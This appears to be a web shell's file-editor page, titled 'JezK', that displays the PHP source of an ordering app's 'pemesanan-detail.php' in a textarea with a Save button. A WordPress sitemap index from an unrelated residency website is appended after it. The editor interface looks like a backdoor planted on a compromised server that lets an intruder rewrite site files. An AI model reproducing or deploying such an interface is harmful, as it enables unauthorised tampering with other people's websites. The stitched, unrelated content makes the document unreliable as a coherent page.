
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: pemesanan-detail.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
	// start session
	session_start();
	
	// set time for session timeout
	$currentTime = time() + 25200;
	$expired = 3600;
	
	// if session not set go to login page
	if(!isset($_SESSION['user'])){
		header(&quot;location:index.php&quot;);
	}
	
	// if current time is more than session timeout back to login page
	if($currentTime &gt; $_SESSION['timeout']){
		session_destroy();
		header(&quot;location:index.php&quot;);
	}
	
	// destroy previous session timeout and create new one
	unset($_SESSION['timeout']);
	$_SESSION['timeout'] = $currentTime + $expired;
	
?&gt;
&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;
&quot;http://www.w3.org/TR/html4/loose.dtd&quot;&gt;

&lt;html xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;
    &lt;head&gt;
        &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
        &lt;link rel=&quot;stylesheet&quot; href=&quot;css/font-awesome.min.css&quot;&gt;
        &lt;link rel=&quot;stylesheet&quot; href=&quot;css/bootstrap.css&quot;&gt;
        &lt;link rel=&quot;stylesheet&quot; href=&quot;css/custom.css&quot;&gt;
		&lt;title&gt;Pharisee&lt;/title&gt;
		&lt;link rel=&quot;icon&quot; href=&quot;./images/icons/favicon.png&quot; type=&quot;image/icon type&quot;&gt;
    &lt;/head&gt;
    &lt;body&gt;
    	&lt;div id=&quot;container&quot;&gt;
    		&lt;?php include('public/menubar.php'); ?&gt;
    		&lt;?php include('public/pemesanan_data.php'); ?&gt;
			&lt;?php include('public/footer.php'); ?&gt;
    	&lt;/div&gt;
&lt;style&gt;
   
    @media print {
		@media print {
   body { font-size: 5pt }
 }
 @media screen {
   body { font-size: 5px }
 }
 @media screen, print {
   body { line-height: 1.2 }
 }
		}
        
}
&lt;/style&gt;

    &lt;script src=&quot;css/js/jquery.min.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;css/js/bootstrap.min.js&quot;&gt;&lt;/script&gt;
    &lt;script&gt;
		function printDiv() {
     var printContents = document.getElementById('print_area').innerHTML;
     var originalContents = document.body.innerHTML;

     document.body.style.fontSize= &quot;10px&quot;;
     document.body.innerHTML = printContents;

     window.print();
    document.body.innerHTML = originalContents;
    document.body.style.fontSize= &quot;14px&quot;;
}
&lt;/script&gt;	
    &lt;/body&gt;
&lt;/html&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://satyadevaresidency.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-gallery-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-posts-testimonial-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://satyadevaresidency.com/wp-sitemap-taxonomies-gallery_cat-1.xml</loc></sitemap></sitemapindex>
